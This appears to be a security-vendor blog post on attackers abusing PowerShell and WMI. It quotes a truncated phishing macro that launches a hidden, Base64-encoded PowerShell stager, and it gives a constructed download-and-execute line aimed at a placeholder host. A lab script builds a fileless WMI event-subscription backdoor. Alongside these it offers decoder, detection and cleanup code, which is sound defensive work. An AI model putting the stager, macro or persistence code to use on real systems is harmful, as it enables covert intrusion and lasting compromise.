As defensive technologies improve and defenders get better at spotting unusual processes and binaries on their endpoints, attackers adjust in turn: they work harder and get more creative about staying under the radar.
With so many solutions these days focused on malware and identification of malicious code, attackers are finding ways to operate without downloading tools and backdoors. Increasingly, attackers are leveraging the tools already on the box and finding new and creative ways to employ them in the pursuit of their goal. This has often been referred to as “living off the land,” and it’s often extremely difficult to uncover attacks of this nature.
Two tools present on nearly every Windows system are powerful and versatile enough to accomplish almost anything an adversary needs: PowerShell and Windows Management Instrumentation (WMI).
By now, everyone has probably heard of the risks involving PowerShell and how attackers are increasingly targeting it for abuse. There has been a lot written about PowerShell and how to leverage it for attacks. The Carbon Black Threat Research Team has recently discovered a new family of ransomware, which we dubbed “PowerWare,” that targets organizations via Microsoft Word and PowerShell.
There are even frameworks built around PowerShell to facilitate its use as an attack tool – complete with scripts to execute remote code in the context of PowerShell, do your recon for you, and establish persistence mechanisms.
Here is a snippet from a malicious macro embedded in a Word document used in an actual phishing campaign:
Public Function Decrypt_Document() As Variant
    Dim Str As String
    ' Build the launch command in pieces: no profile, non-interactive,
    ' hidden window, and the payload passed Base64-encoded on the command line.
    Str = "powershell.exe -NoP -NonI -W Hidden -Enc JABXAEMAP"
    Str = Str + "QBOAEUAdwAtAE8AQgBqAGUAQwB0ACAAUwB5AFMAdABFAG0ALgB"
    Str = Str + "OAEUAdAAuAFcARQBiAEMATABpAGUAbgBUADsAJAB1AD0AJwBNA"
    Str = Str + "G8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHM"
    ' (the remaining fragments and the call that launches Str are not shown in the snippet)
End Function
This macro assembles a long PowerShell command line and then executes it, a common way to run malicious code without ever dropping a binary. The flags are the tell: -NoP skips the user's profile, -NonI suppresses interactive prompts, -W Hidden keeps the console window off the screen, and -Enc passes the script itself as a Base64 string of UTF-16LE text. No execution-policy bypass is needed here, because the execution policy only governs script files, not commands supplied on the command line; an encoded command runs regardless of it. What the encoding does buy the attacker is freedom from quoting problems and a payload that is not readable at a glance in process or command-line logs. Once running, the script could do reconnaissance and send data back, establish persistence, or pull down further PowerShell and execute it in memory. This is one simple example of how attackers use PowerShell, but a very common one.
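The decode-and-triage step a responder applies to a command line like the one above, as an added example that is not code from the original post or from Carbon Black. ConvertFrom-EncodedCommand undoes the -Enc encoding (Base64 over UTF-16LE, padding repaired because captured samples are often truncated), and Test-PowerShellCommandLine scores the launch flags and the decoded content for the tells discussed above. The first sample is the macro's own string, joined from its four fragments and truncated exactly as on the page; the other two command lines, the file path and the example.invalid URL are constructed here.

```powershell
function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    # -Enc payloads are Base64 of UTF-16LE text. Pad first: a truncated or
    # hand-copied sample is often not a multiple of four characters.
    $padded = $Base64.PadRight($Base64.Length + ((4 - $Base64.Length % 4) % 4), [char]'=')
    [byte[]]$bytes = [Convert]::FromBase64String($padded)
    if ($bytes.Length % 2 -eq 1) {
        # An odd byte count means the last UTF-16 code unit is incomplete; drop it.
        $bytes = [byte[]]$bytes[0..($bytes.Length - 2)]
    }
    return [Text.Encoding]::Unicode.GetString($bytes)
}

function Test-PowerShellCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)
    $hits    = [System.Collections.Generic.List[string]]::new()
    $decoded = $null

    # Launch-flag tells. powershell.exe accepts any unambiguous prefix of a switch
    # (-W, -Win, -WindowStyle ...), so the patterns match short and long spellings.
    if ($CommandLine -match '\s-w\w*\s+hidden')  { $hits.Add('hidden window') }
    if ($CommandLine -match '\s-nop\w*\b')       { $hits.Add('profile skipped') }
    if ($CommandLine -match '\s-noni\w*\b')      { $hits.Add('non-interactive') }
    if ($CommandLine -match '\s-e\w*\s+bypass')  { $hits.Add('execution policy bypass') }
    if ($CommandLine -match '\s-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{16,})') {
        $hits.Add('encoded command')
        $decoded = ConvertFrom-EncodedCommand $Matches[1]
    }

    # Content tells, checked against the decoded script when there is one and
    # against the raw command line otherwise (a -Command payload is plain text).
    $body = if ($decoded) { $decoded } else { $CommandLine }
    $contentTells = [ordered]@{
        'downloader object' = 'net\.webclient|invoke-webrequest|downloadstring|downloadfile'
        'in-memory execute' = '\biex\b|invoke-expression'
        'nested encoding'   = 'frombase64string'
    }
    foreach ($name in $contentTells.Keys) {
        if ($body -match $contentTells[$name]) { $hits.Add($name) }
    }

    [pscustomobject]@{
        Score       = $hits.Count
        Indicators  = ($hits -join ', ')
        Decoded     = $decoded
        CommandLine = $CommandLine
    }
}

# Sample 1 is the page's own macro payload (four fragments joined, still truncated).
$fromMacro = 'powershell.exe -NoP -NonI -W Hidden -Enc JABXAEMAP' +
             'QBOAEUAdwAtAE8AQgBqAGUAQwB0ACAAUwB5AFMAdABFAG0ALgB' +
             'OAEUAdAAuAFcARQBiAEMATABpAGUAbgBUADsAJAB1AD0AJwBNA' +
             'G8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHM'
$samples = @(
    $fromMacro,
    # Constructed: an administrator's scheduled script, one tell only.
    'powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1',
    # Constructed: the same stager idea without encoding, payload in clear text.
    'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/a'')"'
)
$samples | ForEach-Object { Test-PowerShellCommandLine $_ } | Format-List
```

Run against these inputs, the macro sample scores five (hidden window, profile skipped, non-interactive, encoded command, downloader object): its payload decodes to `$WC=NEw-OBjeCt SyStEm.NEt.WEbCLienT;$u='Mozilla/5.0 (Window`, the opening of a stager that creates a WebClient and sets a browser-like User-Agent before the snippet cuts off. The administrator's line scores one and the clear-text stager four. The mixed-case cmdlet names in the decoded script are themselves a tell worth a rule: they exist only to defeat case-sensitive string matching.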
(Be sure to see Carbon Black's recent threat alert on "PowerWare," ransomware written in PowerShell, that is targeting organizations via Microsoft Word.)
Windows Management Instrumentation (WMI) is a Windows management framework that has been around since the NT days, although it never saw much use outside of systems management. It was PowerShell that really opened up WMI and made it accessible. The combination is very powerful: by manipulating WMI from PowerShell, you can accomplish just about anything on the box. WMI also facilitates lateral movement, because its interfaces are reachable on remote systems over two transports: the classic DCOM/RPC path used by Get-WmiObject -ComputerName, and Windows Remote Management (WinRM), the WS-Management transport used by the CIM cmdlets and by PowerShell remoting itself.
At Black Hat USA 2015, Matthew Graeber gave an excellent talk, "Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asynchronous, and Fileless Backdoor," on using WMI to do lots of evil stuff, including creating a persistent backdoor without introducing any additional binaries to the system. A whitepaper describing the technique is available here. I highly suggest giving it a read to better understand the power available to attackers without needing to execute any "malware."
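What such a WMI-resident backdoor looks like, and how a responder finds one, as an added example that is not code from the original post or from Graeber's paper. The persistence is a permanent event subscription: a WQL filter (the trigger), a CommandLineEventConsumer (the action) and a __FilterToConsumerBinding that joins them, all three stored in the WMI repository rather than as files on disk. The defender half resolves every binding to its filter and consumer so the three pieces are reviewed together. Lab use only, run as an administrator; the names LabDemoFilter and LabDemoConsumer, the uptime window and the benign timestamp-writing payload are hypothetical choices made here.

```powershell
$ns = 'root\subscription'

# --- Attacker side -----------------------------------------------------------
# Filter: fires once per boot when the uptime counter passes through the window
# below. WMI re-evaluates the polled class every 60 seconds (WITHIN 60).
$filter = Set-WmiInstance -Namespace $ns -Class __EventFilter -Arguments @{
    Name           = 'LabDemoFilter'
    EventNamespace = 'root\cimv2'
    QueryLanguage  = 'WQL'
    Query          = "SELECT * FROM __InstanceModificationEvent WITHIN 60 " +
                     "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' " +
                     "AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"
}
# Consumer: the command WMI runs when the filter fires. A real implant puts an
# -Enc stager here; this one only writes a timestamp so the trigger is observable.
$consumer = Set-WmiInstance -Namespace $ns -Class CommandLineEventConsumer -Arguments @{
    Name                = 'LabDemoConsumer'
    CommandLineTemplate = 'powershell.exe -NoP -NonI -W Hidden -c "Get-Date | Set-Content $env:TEMP\wmi-demo.txt"'
}
# Binding: until this exists the filter and consumer are inert. After it exists
# the subscription survives reboots with no file, service or Run key involved.
Set-WmiInstance -Namespace $ns -Class __FilterToConsumerBinding -Arguments @{
    Filter   = $filter
    Consumer = $consumer
} | Out-Null

# --- Defender side -----------------------------------------------------------
function Get-WmiPersistence {
    # Index filters and consumers by name, then walk the bindings. Enumerating
    # the abstract __EventConsumer class returns every concrete consumer type.
    $filters   = @{}
    $consumers = @{}
    Get-WmiObject -Namespace $ns -Class __EventFilter   | ForEach-Object { $filters[$_.Name]   = $_ }
    Get-WmiObject -Namespace $ns -Class __EventConsumer | ForEach-Object { $consumers[$_.Name] = $_ }

    Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding | ForEach-Object {
        # Binding properties are WMI object paths such as __EventFilter.Name="X".
        $f = $filters[[regex]::Match($_.Filter,   'Name="([^"]+)"').Groups[1].Value]
        $c = $consumers[[regex]::Match($_.Consumer, 'Name="([^"]+)"').Groups[1].Value]
        [pscustomobject]@{
            Filter       = $f.Name
            Query        = $f.Query
            ConsumerType = $c.__CLASS
            Consumer     = $c.Name
            # CommandLine consumers carry a command template, ActiveScript ones a script body.
            Payload      = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ScriptText }
            RunsCode     = $c.__CLASS -in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer'
        }
    }
}

function Remove-WmiPersistence {
    param([Parameter(Mandatory)][string]$FilterName, [Parameter(Mandatory)][string]$ConsumerName)
    # Remove the binding first; deleting a filter or consumer alone leaves a dangling reference.
    Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
        Where-Object { $_.Filter -match "Name=`"$FilterName`"" } | Remove-WmiObject
    Get-WmiObject -Namespace $ns -Class __EventFilter   -Filter "Name='$FilterName'"   | Remove-WmiObject
    Get-WmiObject -Namespace $ns -Class __EventConsumer -Filter "Name='$ConsumerName'" | Remove-WmiObject
}

Get-WmiPersistence | Where-Object RunsCode | Format-List
Remove-WmiPersistence -FilterName 'LabDemoFilter' -ConsumerName 'LabDemoConsumer'
```

Two things to keep in mind when hunting with this. A stock Windows install already has one binding in root\subscription, "SCM Event Log Filter" to the NTEventLogEventConsumer "SCM Event Log Consumer", which is expected and does not run code, so filter on ConsumerType rather than on the mere presence of a binding. And because the three objects are separate, a query that lists only __EventFilter or only consumers misses the relationship that makes a subscription live; review the bindings. The same enumeration works against remote hosts with Get-WmiObject -ComputerName (DCOM) or, over WinRM, with Get-CimInstance through a CimSession.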
Advanced Threat Feed Updates
To help counter some of these attacks, we added several queries to the Carbon Black Advanced Threats feed that look for some tells that PowerShell and WMI are being abused in the environment. The capability of Carbon Black Enterprise Response to look for specific command lines enables us to catch some of these activities that would otherwise be extremely difficult to identify. While we can’t capture all of the possible ways that a malicious actor might leverage these tools, it gives a good base of coverage.
As sophisticated adversaries increasingly work to avoid the filesystem and generate as few observables on the system as possible, these types of techniques will only increase in use. While there are a lot of technologies out there to try to identify “malware,” it’s important to remember what can be accomplished by a motivated adversary without it.
Malware is just one more tool to help the adversary, but typically everything needed for an adversary to get what they’re after is already there waiting for them.